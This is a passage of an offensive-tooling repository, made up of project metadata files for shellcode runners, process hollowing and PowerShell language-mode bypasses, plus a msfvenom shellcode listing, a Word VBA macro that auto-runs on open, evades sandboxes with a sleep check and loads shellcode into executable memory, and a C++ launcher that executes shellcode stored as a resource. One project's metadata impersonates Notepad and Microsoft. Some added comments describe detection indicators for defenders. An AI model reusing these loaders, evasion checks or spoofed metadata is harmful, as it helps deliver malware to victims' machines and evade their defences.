5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_MapViewOfSection")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_MapViewOfSection")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("0fa83ecd-56dd-4fe7-bf6e-e13f5aefc84b")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_ProcessHollowing")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_ProcessHollowing")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3a5b1fc9-2ed3-49c2-9ec0-9ca3a870f2d2")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_ProcessInjection")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_ProcessInjection")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59e7bc8e-7ac5-4393-ae49-4a4af40ed1a5")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner_Caesar")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6cf52967-b154-4592-9370-bfefd78cbdf8")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/EnumSystemCodePagesA_SC_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Notepad")] // becomes the file description in the version resource; it names a Windows tool rather than this project (EnumSystemCodePagesA_SC_Runner)
9 | [assembly: AssemblyDescription("Notepad")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("Microsoft Corporation")] // author-supplied string, not evidence of who built the binary; the Authenticode signature is what identifies the publisher
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("67ed8f5f-62bc-4fa3-b6d1-00b5a29c9da3")] // kept in the compiled assembly's metadata and unaffected by the spoofed title and company above, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("10.0.19041.1320")] // NOTE(review): formatted like a Windows 10 build number rather than a project version, presumably to match the identity claimed above
36 | [assembly: AssemblyFileVersion("10.0.19041.1320")] // file version shown in the binary's properties; author-chosen, so triage should compare signer and hash rather than these fields
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeBuilder_VBA_Caesar")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeBuilder_VBA_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("00d1ad9c-f443-4ff1-b2bf-acb805f39f7f")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64-thread.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/exec cmd="calc.exe" exitfunc=thread -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 276 bytes
6 | Final size of c file: 1185 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
15 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
23 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
26 | "\x63\x2e\x65\x78\x65\x00";
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ShellcodeRunner_Caesar_ExNuma")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1d459c1a-ce23-456c-bc05-bcb698df38db")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Powershell_CLM_Bypass_InstallUtil")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Powershell_CLM_Bypass_InstallUtil")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2357ff3b-8147-4b9a-9e33-a4c0e2cdebda")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_InstallUtil_Bypass")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_InstallUtil_Bypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9256a08b-3fe0-4746-b6ee-050183c4eafe")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_SpawnShell")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_SpawnShell")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9c213991-b733-4907-be3f-03d8317ade11")] // kept in the compiled assembly's metadata and unaffected by renaming the file; the same value appears in /PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs, so one match covers builds of both copies
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner_Caesar_ExNuma")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("33dde983-b924-4bb1-8c54-82d57fe06bf9")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_DLLInject_ExNuma_XOR/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_DLLInject_ExNuma_XOR")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_DLLInject_ExNuma_XOR")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("8d6f149b-b396-4633-9ac6-28dc37ee0a14")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/VisualBasic/vba_macro_inmeminj_timer.vb:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr ' kernel32 import; mymacro uses it to start a thread at the allocated address
2 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr ' kernel32 import; mymacro uses it to allocate memory with a caller-chosen protection
3 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr ' kernel32 import; mymacro uses it to copy bytes to a raw address
4 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long ' used for the timing check in mymacro. Declare statements for these APIs in a document macro are a static triage indicator; the Defender ASR rule "Block Win32 API calls from Office macros" targets this pattern
5 |
' mymacro: in-memory loader run by the Document_Open / AutoOpen handlers below.
' It waits, checks how much time really passed, decodes buf, copies it byte by
' byte into memory returned by VirtualAlloc and starts a thread at that address.
' Defender notes: an Office process that Declares VirtualAlloc / RtlMoveMemory /
' CreateThread and ends up with a thread starting in private executable memory
' is a strong signal. Blocking macros in files from the Internet and the ASR
' rule "Block Win32 API calls from Office macros" stop this pattern before it runs.
6 | Function mymacro()
7 | Dim buf As Variant
8 | Dim addr As LongPtr
9 | Dim counter As Long
10 | Dim data As Long
11 | 'Dim res As LongPtr
12 | Dim t1 As Date
13 | Dim t2 As Date
14 | Dim time As Long
15 |
' Timing check: sleep 2000 ms and measure the elapsed wall-clock seconds.
16 | t1 = Now()
17 | Sleep (2000)
18 | t2 = Now()
19 | time = DateDiff("s", t1, t2)
20 |
' Exit without doing anything if fewer than 2 seconds elapsed. Presumably this
' targets analysis environments that skip or shorten Sleep; confirm with the author.
21 | If time < 2 Then
22 | Exit Function
23 | End If
24 |
' The payload array is empty in this listing.
25 | buf = Array()
26 |
' Decode step: every element is reduced by 2 before use.
27 | For i = 0 To UBound(buf)
28 | buf(i) = buf(i) - 2
29 | Next i
30 |
' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
' The return value is not checked before it is used as the copy destination.
31 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
32 | For counter = LBound(buf) To UBound(buf)
33 | data = buf(counter)
34 | res = RtlMoveMemory(addr + counter, data, 1)
35 | Next counter
36 |
' Start a thread whose start address is the freshly written buffer.
37 | res = CreateThread(0, 0, addr, 0, 0, 0)
38 | End Function
39 |
' Auto-run handler: Word raises Document_Open when the document is opened,
' so mymacro runs without further user action once macros are enabled.
40 | Sub Document_Open()
41 | mymacro
42 | End Sub
43 |
' Second auto-run entry point (the AutoOpen macro name); it calls the same
' loader as Document_Open.
44 | Sub AutoOpen()
45 | mymacro
46 | End Sub
47 |
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 |
31 |
32 | Resource Files
33 |
34 |
35 |
36 |
37 | Resource Files
38 |
39 |
40 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include "resource.h"
4 |
// main: reads the RT_RCDATA resource IDR_RCDATA1 from this executable, copies
// it into a new read/write allocation, switches that region to execute/read
// and runs it on a new thread, then waits for the thread to finish.
// Returns 0 on success and -1 when one of the checked calls fails.
// Defender notes: the payload is stored in .rsrc, so static triage should
// inspect RCDATA entries. At run time the sequence is RW allocation ->
// VirtualProtect to PAGE_EXECUTE_READ -> CreateThread with a start address in
// private memory not backed by an image, which memory scanners and EDR
// thread-start telemetry commonly flag.
5 | int main()
6 | {
7 | unsigned char* shellcode;
8 | SIZE_T scSize;
9 |
10 | // Generate a resource.rc & resource.h pointing to a file of binary (raw) type shellcode
11 | // .rsrc storage && .rsrc payload extraction
// None of the four resource calls below has its result checked.
12 | HRSRC res = FindResourceW(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
13 | HGLOBAL resHandle = LoadResource(NULL, res);
14 | shellcode = (unsigned char*)LockResource(resHandle);
15 | scSize = SizeofResource(NULL, res);
16 |
17 | //SIZE_T scSize = sizeof(shellcode);
18 |
// Allocation is read/write only at this point; the result is printed but not checked.
19 | PVOID vAlloc = VirtualAlloc(0, scSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
20 | printf("[*] Mem: %p\n", vAlloc);
21 |
// memmove returns its destination pointer, so this branch only triggers when
// that pointer is null; the message names RtlMoveMemory although memmove is called.
22 | if (!memmove(vAlloc, shellcode, scSize))
23 | {
24 | printf("RtlMoveMemory Failed: %d\n", GetLastError());
25 | return -1;
26 | };
27 |
28 |
// Flip the region from RW to RX so it is never writable and executable at once.
29 | DWORD lpflOldProtect;
30 | if (!VirtualProtect(vAlloc, scSize, PAGE_EXECUTE_READ, &lpflOldProtect)) {
31 | printf("VirtualProtect Failed: %d\n", GetLastError());
32 | return -1;
33 | }
34 |
35 |
// The thread's start routine is the copied buffer itself.
36 | HANDLE cThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)vAlloc, 0, 0, 0);
37 | if (!cThread) {
38 | printf("CreateThread Failed: %d\n", GetLastError());
39 | return -1;
40 | }
41 |
// WAIT_TIMEOUT | WAIT_FAILED evaluates to WAIT_FAILED (0xFFFFFFFF), so the
// comparison is effectively against WAIT_FAILED alone.
42 | if (WaitForSingleObject(cThread, INFINITE) == (WAIT_TIMEOUT | WAIT_FAILED)) {
43 | printf("WaitForSingleObject Failed: %d\n", GetLastError());
44 | return -1;
45 | }
46 | CloseHandle(cThread);
47 | return 0;
48 | }
49 |
--------------------------------------------------------------------------------
